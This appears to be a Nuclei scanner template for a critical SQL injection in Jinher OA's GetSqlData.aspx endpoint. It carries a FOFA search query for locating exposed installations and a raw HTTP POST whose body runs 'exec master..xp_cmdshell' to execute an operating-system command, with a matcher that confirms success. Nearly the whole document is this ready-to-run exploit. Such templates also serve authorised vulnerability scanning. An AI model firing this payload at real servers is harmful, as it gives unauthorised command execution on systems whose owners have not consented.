id: jinher-oa-sql-GetSqlData 

info:
  name: jinher-oa-sql-GetSqlData 
  author: p1z
  severity: critical
  description: |
    金和网络 oa GetSqlData.aspx 文件存在sql注入漏洞
  reference: https://github.com/ibaiw/2023Hvv/blob/main/%E9%87%91%E5%92%8COA%20C6-GetSqlData.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20POC.md
  metadata:
    fofa-query: app="金和网络-金和OA"
    hunter-query:
    verified: true
  tags: 2023,jinher,oa,sql

http:
  - raw:
      - |
        POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/json
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
        Connection: close
        Content-Length: 189
        Content-Type: text/plain
        Accept-Encoding: gzip

        exec master..xp_cmdshell 'ipconfig'

    matchers:
      - type: word
        part: body
        words:
          - 'IP'